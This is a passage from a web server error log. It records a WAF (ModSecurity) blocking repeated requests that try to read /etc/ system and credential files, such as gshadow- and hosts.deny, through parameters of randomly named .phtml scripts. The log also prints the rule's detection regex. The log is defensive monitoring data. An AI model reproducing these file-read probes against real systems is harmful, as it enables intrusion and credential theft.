"abwiu-yqAr6etmhZHNpy5QAAAEA"]
[Thu Mar 19 13:22:19.464131 2026] [:error] [pid 15826:tid 140411699963648] [client 57.141.18.106:49466] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiu-oXxyEfFpUF8f8f9wAAAUU"]
[Thu Mar 19 13:22:19.948219 2026] [:error] [pid 27403:tid 140411565680384] [client 57.141.18.45:49480] [client 57.141.18.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiuxkFeYa1D6dYQnAEPQAAAdU"]
[Thu Mar 19 13:22:20.163332 2026] [:error] [pid 14269:tid 140411624429312] [client 57.141.18.122:49482] [client 57.141.18.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwivAbLMZ6AikZjR9VwfAAAAA4"]
[Thu Mar 19 13:22:20.875682 2026] [:error] [pid 26799:tid 140411649607424] [client 57.141.18.81:49496] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwivNa6ubjKNq_cu4ZpxwAAA0s"]
[Thu Mar 19 13:22:21.288387 2026] [:error] [pid 17887:tid 140411616036608] [client 57.141.18.52:49488] [client 57.141.18.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwivQkwaGbbGflqUZDanAAAAM8"]
[Thu Mar 19 13:22:21.570521 2026] [:error] [pid 17887:tid 140411641214720] [client 57.141.18.8:49506] [client 57.141.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/percona-server.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwivQkwaGbbGflqUZDanQAAAMw"]
[Thu Mar 19 13:22:21.709527 2026] [:error] [pid 17887:tid 140411548894976] [client 57.141.18.7:49508] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwivQkwaGbbGflqUZDangAAANc"]
[Thu Mar 19 13:22:22.353197 2026] [:error] [pid 17887:tid 140411683178240] [client 57.141.18.47:49520] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwivgkwaGbbGflqUZDaoAAAAMc"]
[Thu Mar 19 13:22:22.671903 2026] [:error] [pid 17887:tid 140411599251200] [client 57.141.18.32:49524] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwivgkwaGbbGflqUZDaogAAANE"]
[Thu Mar 19 13:22:22.961149 2026] [:error] [pid 17887:tid 140411565680384] [client 57.141.18.86:49526] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwivgkwaGbbGflqUZDapAAAANU"]
[Thu Mar 19 13:22:23.129797 2026] [proxy_fcgi:error] [pid 17887:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:46336] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:22:23.309403 2026] [:error] [pid 17887:tid 140411708356352] [client 57.141.18.104:49534] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwivwkwaGbbGflqUZDapgAAAMQ"]
[Thu Mar 19 13:22:23.795397 2026] [:error] [pid 17887:tid 140411741927168] [client 57.141.18.45:49554] [client 57.141.18.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwivwkwaGbbGflqUZDarAAAAMA"]
[Thu Mar 19 13:22:24.911592 2026] [:error] [pid 17887:tid 140411582465792] [client 57.141.18.66:49584] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwiwAkwaGbbGflqUZDasAAAANM"]
[Thu Mar 19 13:22:25.600395 2026] [:error] [pid 17887:tid 140411616036608] [client 57.141.18.13:49602] [client 57.141.18.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiwQkwaGbbGflqUZDaswAAAM8"]
[Thu Mar 19 13:22:25.949549 2026] [:error] [pid 27403:tid 140411540502272] [client 57.141.18.106:49610] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hostname"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwiwRkFeYa1D6dYQnAEPgAAAdg"]
[Thu Mar 19 13:22:26.239448 2026] [:error] [pid 17887:tid 140411599251200] [client 57.141.18.37:49616] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwiwgkwaGbbGflqUZDatAAAANE"]
[Thu Mar 19 13:22:26.270810 2026] [:error] [pid 26799:tid 140411632822016] [client 57.141.18.26:49618] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwiwta6ubjKNq_cu4ZpyAAAA00"]
[Thu Mar 19 13:22:26.979852 2026] [:error] [pid 31803:tid 140411666392832] [client 57.141.18.53:49626] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyncd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiwuyqAr6etmhZHNpy5gAAAEk"]
[Thu Mar 19 13:22:27.372160 2026] [:error] [pid 14269:tid 140411590858496] [client 57.141.18.7:49632] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/motd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwiwwbLMZ6AikZjR9VwfQAAABI"]
[Thu Mar 19 13:22:28.095738 2026] [:error] [pid 27403:tid 140411599251200] [client 57.141.18.20:49648] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwixBkFeYa1D6dYQnAEPwAAAdE"]
[Thu Mar 19 13:22:28.156102 2026] [:error] [pid 19093:tid 140411540502272] [client 57.141.18.95:49650] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwixF_V7PWP6ixUYl7PsQAAApg"]
[Thu Mar 19 13:22:28.552932 2026] [:error] [pid 14269:tid 140411641214720] [client 57.141.18.16:49656] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwixAbLMZ6AikZjR9VwfgAAAAw"]
[Thu Mar 19 13:22:28.847663 2026] [:error] [pid 31803:tid 140411649607424] [client 57.141.18.68:49662] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwixOyqAr6etmhZHNpy5wAAAEs"]
[Thu Mar 19 13:22:30.275474 2026] [:error] [pid 17887:tid 140411616036608] [client 57.141.18.43:49700] [client 57.141.18.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwixgkwaGbbGflqUZDauQAAAM8"]
[Thu Mar 19 13:22:30.690161 2026] [:error] [pid 26799:tid 140411733534464] [client 57.141.18.4:49712] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc0.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwixta6ubjKNq_cu4ZpywAAA0E"]
[Thu Mar 19 13:22:31.232063 2026] [:error] [pid 31803:tid 140411733534464] [client 57.141.18.41:49726] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwix-yqAr6etmhZHNpy6AAAAEE"]
[Thu Mar 19 13:22:31.876234 2026] [:error] [pid 19093:tid 140411708356352] [client 57.141.18.97:49738] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwix1_V7PWP6ixUYl7PtAAAAoQ"]
[Thu Mar 19 13:22:31.957419 2026] [:error] [pid 14269:tid 140411632822016] [client 74.7.244.43:52488] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwixwbLMZ6AikZjR9VwgAAAAA0"]
[Thu Mar 19 13:22:32.112764 2026] [:error] [pid 31803:tid 140411624429312] [client 57.141.18.36:49744] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/services"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwiyOyqAr6etmhZHNpy6gAAAE4"]
